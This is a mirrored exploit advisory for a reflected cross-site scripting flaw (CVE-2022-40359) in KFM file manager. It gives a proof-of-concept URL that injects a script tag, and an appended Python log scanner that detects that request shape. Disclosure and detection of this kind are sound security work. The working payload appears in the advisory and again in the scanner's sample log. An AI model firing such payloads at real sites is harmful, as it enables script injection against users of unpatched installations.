
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022090057

Below is a copy:

KFM Kae's File Manager - ALL - Reflected Cross-Site Scripting (XSS)
# Exploit Title: KFM Kae's File Manager - ALL - Reflected Cross-Site Scripting (XSS)
# Exploit Author: Scott Sturrock 'ssturrock -at- protonmail -dot- com'
# Vendor Homepage: https://code.google.com/archive/p/kfm/downloads
# Software Link: https://code.google.com/archive/p/kfm/downloads
# Version: ALL
# Tested on: Linux, Windows
# CVE : CVE-2022-40359

Cross-site scripting (XSS) vulnerability in KFM through 1.4.7 via a crafted GET request to /kfm/index.php.

Visit the PoC URL in a browser:
https://{URL}/kfm/index.php/'%3CSCRIPT%3Ealert('XSS');%3C/SCRIPT%3E
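
A detection check for the request shape above, added here as an example and not part of the original advisory: it scans web access-log lines for requests whose path continues past /kfm/index.php and URL-decodes to markup characters. The combined log format, the sample lines and all function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Request line of a combined-log-format entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# Path that continues past index.php (PATH_INFO), up to any query string
PATH_INFO_RE = re.compile(r"/kfm/index\.php(?P<extra>/[^?#]*)", re.IGNORECASE)
# Characters needed to break out into HTML/JS that a normal path never carries
MARKUP_CHARS = set("<>'\"")

# Constructed sample log lines (documentation IP range, invented timestamps)
SAMPLE_LOG = r"""
203.0.113.5 - - [01/Sep/2022:10:00:00 +0000] "GET /kfm/index.php HTTP/1.1" 200 5120
203.0.113.5 - - [01/Sep/2022:10:00:02 +0000] "GET /kfm/index.php/ HTTP/1.1" 200 5120
203.0.113.9 - - [01/Sep/2022:10:00:07 +0000] "GET /kfm/index.php/'%3CSCRIPT%3Ealert('XSS');%3C/SCRIPT%3E HTTP/1.1" 200 5300
203.0.113.9 - - [01/Sep/2022:10:00:09 +0000] "GET /kfm/index.php/%253Cb%253E HTTP/1.1" 200 5300
""".strip().splitlines()

def decode_fully(value, max_rounds=3):
    """URL-decode repeatedly so double-encoded input (%253C -> %3C -> <) is caught."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_path_info(log_line):
    """Return the decoded trailing path if it contains markup characters, else None."""
    request = REQUEST_RE.search(log_line)
    if not request:
        return None
    match = PATH_INFO_RE.search(request.group("target"))
    if not match:
        return None
    extra = decode_fully(match.group("extra"))
    return extra if MARKUP_CHARS & set(extra) else None

def scan(lines):
    """Return (line_number, decoded_path) for every flagged line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        decoded = suspicious_path_info(line)
        if decoded is not None:
            hits.append((number, decoded))
    return hits

if __name__ == "__main__":
    for number, decoded in scan(SAMPLE_LOG):
        print(f"line {number}: markup in path after index.php: {decoded!r}")
```
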
